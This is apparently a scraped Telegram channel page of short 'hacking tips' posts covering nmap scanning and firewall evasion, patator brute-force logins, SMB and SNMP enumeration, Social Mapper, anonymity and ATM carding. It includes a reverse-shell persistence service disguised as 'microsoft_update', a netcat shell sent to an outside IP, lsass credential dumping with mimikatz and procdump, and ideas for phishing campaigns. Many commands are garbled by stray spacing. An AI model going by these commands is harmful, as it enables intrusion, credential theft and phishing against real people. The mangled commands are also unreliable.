UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Best NMAP scanning strategy


# The best nmap scanning strategy for all sizes of networks # Host discovery, generating a list of live hosts $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24


> $ grep "Status: Up" Discovery. gnmap | cut -f 2 -d '' > LiveHosts.txt # Port discovery, found most commonly used ports # https://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf $ nmap -sS -T4- Pn -oG TopTCP -iL LiveHosts.txt

> $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt

> $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt # port discovery , Found all ports, but the scanning of UDP ports will be very slow $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt

> $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt # Display TCP \ UDP port $ grep"open" FullTCP | cut -f 1 -d '' | sort -nu | cut -f 1 -d '/' | xargs | sed 's / /, / g' | awk '{print "T:" $ 0} ' $ grep "open" FullUDP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d ' / ' | xargs | sed ' s / /, / g ' | awk ' {print "U: "$ 0} '

# Detect service version $ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt # Scan system scan $ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt # System and service Detect $ nmap -O -sV -T4 -Pn -p U: 53,111,137, T: 21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts. txt

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Nmap Perform web vulnerability scanning
fb.com/undercodeTesting


> cd / usr / share / nmap / scripts /

> wget https://nmap down> from git or site

> nmap_nse_vulscan-2.0.tar.gz&& tar xzf nmap_nse_vulscan-2.0.tar.gz

> nmap -sS -sV --script = vulscan / vulscan.nse target

> nmap -sS -sV --script = vulscan / vulscan.nse --script-args vulscandb = scipvuldb.csv target

> nmap -sS -sV --script = vulscan / vulscan.nse --script-args vulscandb = scipvuldb.csv -p80 target

> nmap -PN -sS -sV --script = vulscan --script-args vulscancorrelation = 1 -p80 target

> nmap -sV --script = vuln target
nmap -PN -sS -sV --script = all --script-args vulscancorrelation = 1 target


πŸ¦‘ use DIRB blasting directory

Note: DIRB is a tool dedicated to blasting directories, which has been installed by default in Kali, Similar tools include foreign patator , dirsearch , DirBuster , domestic sword and so on.

> dirb http: / / IP: PORT / usr/ share / dirb / wordlists / common .txt

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Nmap – avoid firewall :

# segment

> $ nmap -f# Modify the default MTU size, but it must be a multiple of 8 (8, 16, 24, 32, etc.)

> $ nmap --mtu 24 # Generate a random amount of spoofing

> $ nmap -D RND: 10 [target] # Manually specify the use of spoofing IP

> $ nmap -D decoy1, decoy2, decoy3 etc. # botnet scan, first need to find the botnet's IP

> $ nmap -sI [Zombie IP] [Target IP] # specify the source port number $ nmap --source-port 80 IP # Append a random amount of data after each scanned data packet

> $ nmap --data-length 25 IP # MAC address spoofing can generate MAC addresses of different hosts $ nmap --spoof-mac Dell / Apple / 3 Com IP

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ nmap Pratical tips by Undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁


πŸ¦‘More Pratical hacking tips by undercode:
t.me/undercodeTesting


πŸ¦‘ Patator – all-around brute force testing tool


# git clone https://github.com/lanjelot/patator.git / usr / share / patator # SMTP blast

$ patator smtp_login host = 192.168 . 17.129 user = Ololena password = FILE 0 0 = / usr / share / john / password .lst
$ patator smtp_login host = 192.168 . 17.129 user = FILE1 password = FILE 0 0 = / usr / share / john / password .lst 1 = / usr / share / john / usernames .lst

$ patator smtp_login host =192.168 . 17.129 helo = 'ehlo 192.168.17.128' user = FILE1 password = FILE 0 0 = / usr / share / john / password .lst 1 = / usr / share / john / usernames .lst

$ patator smtp_login host = 192.168 . 17.129 user = Ololena password = FILE 0 0 = / usr / share / john / password .lst -x ignore: fgrep = 'incorrect password or account name'


πŸ¦‘ Use Fierce to blast DNS

Note: Fierce will check whether the DNS server allows zone transfer. If allowed, zone transfer will be performed and the user will be notified. If not allowed, the host name can be enumerated by querying the DNS server. Similar tools: subDomainsBrute andSubBrute etc.

# https://ha.ckers.org/fierce/ $ ./fierce.pl -dns example.com
$ ./fierce.pl -dns example.com -wordlist myWordList.txt


use Nikto scan Web Services


Nikto - C all -h https: // IPScan


πŸ¦‘WordPress


git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan --url https: // IP / --enumerate p


πŸ¦‘HTTP fingerprint recognition


wget http: / /www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip cd httprint_301 / linux / ./httprint -h http: // IP -s signatures.txt


scan with Skipfish

Note: Skipfish is a web application security investigation tool. Skipfish will use recursive crawlers and dictionary-based probes to generate an interactive website map. The resulting map will be output after passing security checks.

skipfish -m 5 -LY -S / usr / share / skipfish / dictionaries / complete.wl -o ./skipfish2 -u http: // IP


πŸ¦‘uses NC to scan


nc -v -w 1 target -z 1-1000 for i in {101..102}; do nc -vv -n -w 1 192.168.56. $ I 21-25 -z; done


πŸ¦‘Unicornscan

Note: Unicornscan is a tool for information collection and security audit.

us -H -msf -Iv 192 .168 .56 .101 -p 1 -65535 us -H -mU -Iv 192 .168 .56 .101 -p . 1 -65535 -H resolve the host name in the report generation stage -m scan type ( SF - TCP , the U- - UDP ) -Iv - detail


using the operating system fingerprint identification Xprobe2


Xprobe2 -v - p tcp : 80 : open IP


πŸ¦‘enumeration Samba


nmblookup -A target
smbclient // MOUNT / share -I target -N rpcclient -U "" target
enum4linux target


πŸ¦‘enumeration SNMP


snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP


practical Windows cmd command


net localgroup Users
net localgroup Administrators
search dir / s * .doc system ( "start cmd.exe / k $ cmd" )
sc create microsoft_update binpath = "cmd / K start c: \ nc.exe -d ip-of-hacker port -e cmd.exe" start = auto error = ignore
/ c C: \ nc.exe -ec: \ windows \ system32 \ cmd.exe -vv 23.92 . 17.103 7779 mimikatz.exe "privilege :: debug" "log" "sekurlsa :: logonpasswords"Procdump.exe -accepteula- ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa :: minidump lsass.dmp" "log" "sekurlsa :: logonpasswords" C: \ temp \ procdump.exe -accepteula- ma lsass.exe lsass .dmp 32 -bit system
C: \ temp \ procdump.exe -accepteula- 64 - ma lsass.exe lsass.dmp 64 -bit system


WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ What about hijack wifi ?


1) Hijacker is a penetration testing tool with a graphical user interface. The tool integrates several well-known WiFi penetration tools, such as Aircrack-ng, Airodump-ng, MDK3, Reaver, etc.

2) Hijacker provides a simple and easy-to-use UI interface, users do not have to manually enter commands or copy and paste MAC addresses on the console.

3) This application is only available in the Android version (ARM) and requires the device to have a wireless network card that supports Monitor Mode. At present, only a few devices meet the requirements, so you may need to use custom firmware.

4) Nexus 5 and other devices that use the BCM4399 chip can install Nexmon [ download address ], and devices that use the BCM4300 chip can choose to install bcmon [ download address ].
Note: The device needs Root to use the tool


▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ let s send some social media tracking tips :
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ How Social Mapper open source smart tools work ?


But, "What if it can be done automatically and on a large scale with hundreds or thousands of people?"


πŸ¦‘ Social Mapper runs through three phases:


> Phase 1- The tool is based on what you provide The input of creates a target list (consisting of name and picture). The list can be provided through a link in the CSV file, an image in the folder, or someone registered on LinkedIn on the company.


> Stage 2- Once the target is processed, the second stage of Social Mapper automatically starts online search for social media sites to obtain the target.Researchers recommend running the tool overnight via a good Internet connection, because searching can take more than 15 hours to get a list of 1,000 people and use a lot of bandwidth.


> After the third stage search, the third stage of Social Mapper starts generating reports, such as a spreadsheet that contains a link to the profile page of the target list, or a more intuitive HTML report that contains photos for quick inspection and verification results.

Written by Undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ ABOUT SOCIAL MEDIA TRACKING :

What could go wrong?

1) Although the end result is ideal for promoting highly complex phishing activities or intelligence gathering, Trustwave said it will help security professionals and ethical hackers provide the same tools as bad guys to test customers' security.

2) However, because the tool is now available in open source, anyone including bad guys or intelligence agencies can reuse facial recognition technology to build their own monitoring tools to search for the large amount of data that has been collected. further outlines some evil uses of the social mapper.

3) Once you have mastered the end result, these uses are limited to "only your imagination", which shows that it can be used for:

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Create a fake social media profile for the "friends" target, and then send its link to downloadable malware or obtain credentials for landing pages.
The goal of spoofing is to disclose their emails and phone numbers through vouchers and offers to turn to "phishing, predatory or predatory."

2) Create custom phishing campaigns for each social media platform, make sure the target has an account, and make these more real by including their profile picture in the email. Then capture the password to reuse it.

3) Look at the photo of the target, find the badge of the employee visit card, and get familiar with the interior of the building.


Written by Undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ before tracking an ip adress you must know this
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Detailed IP address summary
t.me/undercodeTesting


1) Classified IP address

Each type of address has another fixed-length field.
Network number: net-idβ€”marks the network to which the host (or router) is connected.

2) Host number: host-idβ€”marks that the host (or router)
two-level IP address can Expressed as:
IP address: = {<network number>, <host number>}
:: = stands for "defined as"
Class A address: network field number 1 byte 8 bits
Class B address: network field number 2 words Section 16-bit
class C address: Network field number 3 bytes 24 bits

πŸ¦‘ Some important characteristics of
IP address 1): IP address is a hierarchical address structure, the benefits of two levels

First: When the IP address management means to assign IP addresses,
assigned network number only
host number obtained by the number of units of the network Discretionary

second: The destination host number only router connected
to a network packet forwarding numbers
so it can make The number of entries in the routing table is greatly reduced, thereby reducing the
storage space occupied by the routing table.

Third:
The network numbers in the IP addresses of hosts or routers in the same local area network must be the same.

Fourth: The router always has two or more IP addresses
. Each interface of the router has an IP address with a different network number.

Fifth: The resolution from the IP address to the hardware address is automatic. The user of the host I
do n’t know this process of address resolution.
As long as the host or router wants
to communicate with another host or router with a known IP address on the network, the ARP protocol will automatically
resolve the IP address to the link layer. Hardware address
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Three-level IP address-subnet division :

1) Subnet division is purely internal to a unit, and the unit still behaves as a network without subnet division.

2) Borrowing several bits from the host number as a subnet number subnet- id, and the host number host-id is correspondingly
reduced by several bits
IP address :: = {<network number>, <subnet number>, <host number>}

3) Process and ideas
Any IP datagram sent from another network to a host of this unit
is still based on the destination network number net-id of the IP datagram, first find
the router connected to the network of this unit
and then this router After receiving the IP datagram,
find the destination subnet according to the destination network number net-id and subnet number subnet-id
Finally deliver the IP datagram directly to the destination host

4) The division of subnets only divides the host-id part of the IP address without changing the original network number of the IP address net-i

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ HOW TO STAY ANONYMOUSLY ON INTERNET FULL BY UNDERCODE :


A) SOCIAL METHODES :


1) Get yourself another account
Today, email has become a universal identifier for a network user identity. Therefore, first of all, it is worth taking care of the second (third, fourth) email address. It can be either just an additional Gmail account, or one of the special mail services described in this article . After that, register on it new accounts in social networks and other necessary services. Never mix your public and private profile.

2) Do not use domestic services
I have nothing against our search, mail, social sites, in many ways they are even better. They are worse only in that, if necessary, interested people or structures can quite easily scratch out the information they need about you. Therefore, do not use the services of the country in which you reside.

3) Change the connection location
If you want to further complicate the work of potential pursuers, then do not sit at home, but take a walk around the neighborhood. An attentive and thoughtful search will tell you dozens of available cafes, computer clubs, libraries from which you can use the Internet, without risking highlighting your real and network address.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘SOFTWARE METHODES HOW TO STAY ANONYMOUSLY ON INTERNET FULL BY UNDERCODE :


1) Proxies
Quite simply, a proxy is a service or program that acts as an intermediary between you and the site you are requesting. It turns out that all your surfing requests will be addressed to only one server, and it will already send them where necessary. In addition to the banal search in the network of open proxies, which are quite sufficient, including free ones, you can use this technology with more sophisticated methods, which we wrote about in the following articles:

How to access sites inaccessible in your country
4 free proxies to block ads
How to use Google services to access restricted sites

2) VPN
Virtual Private Network - these are several technologies and methods that allow you to create a special encrypted and inaccessible channel between a user and the Internet. This allows you to hide your real IP address and become anonymous, as well as encrypt your traffic. In the framework of this article, we will not dwell on deciphering the features of the operation of different VPN protocols, we only note that this method, in general, is quite reliable and easy to use. You can learn about its practical application from our following articles:

> ZenMate - Free VPN for Google Chrome

> Three easy ways to read blocked sites in your country

> TunnelBear - the easiest VPN on your Android

> Hotspot Shield - Internet Without Borders

3) TOR
TOR is a network of routers and software designed specifically to ensure user anonymity. Roughly speaking, when using this technology, your request to the site and the answer from it go through such a winding and complicated way through a chain of proxy servers that it is almost impossible to calculate the client

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Carding tip :

> Bank card fraud is called carding.

1) Let's start with the "classics". You came to withdraw money through an ATM. Hurry, literally on the run, enter the PIN code, while chatting on the phone. You didn’t even look at the inconspicuous guy in a baseball cap and dark glasses looking over your shoulder. But he watched you very carefully. He spied and memorized the numbers that you entered. Next elementary gop-stop - and goodbye, money.

2) Also, in the confusion, you can not see that in front of you is not a real ATM, but a fake. After all, the device is exactly like the real one. Stickers, instructions - everything is as it should. Insert the card, enter the PIN code, and the screen displays: β€œ

> The device is malfunctioning,” β€œA system error has occurred,” β€œNot enough money,” or something like that. Well, it happens. You go to look for another ATM. But before you find it, scammers will empty your account. After all, with the help of a phantom ATM, they already read all the necessary data about your card.

3) Often mimic the malfunction of ATMs . For example, late in the evening you return home and decide on the way to cash out your salary. We inserted a card, entered a PIN code, the amount - everything is going fine. The card reader gave the card, but the tray where the money should appear does not open. Has broken? Probably! Around it is dark, you need to call the bank and find out what happened. You walked literally ten meters, and nimble thieves had already removed the tape and took your money. Yes, yes, notes were not issued by simple adhesive tape.


πŸ¦‘ false
FREE ASSISTANT FOR ALIEXPRESS β„’
FREE ASSISTANT FOR ALIEXPRESS β„’
ALIRADAR WILL SHOW THE BEST DISCOUNTS AND FIND RELIABLE SELLERS - DO NOT LOSE MONEY!
ALIRADAR WILL SHOW THE BEST DISCOUNTS AND FIND RELIABLE SELLERS - DO NOT LOSE MONEY!
ALIRADAR WILL SHOW THE BEST DISCOUNTS AND FIND RELIABLE SELLERS - DO NOT LOSE MONEY!
MORE ON ALIRADAR.COM
YANDEX.DIRECT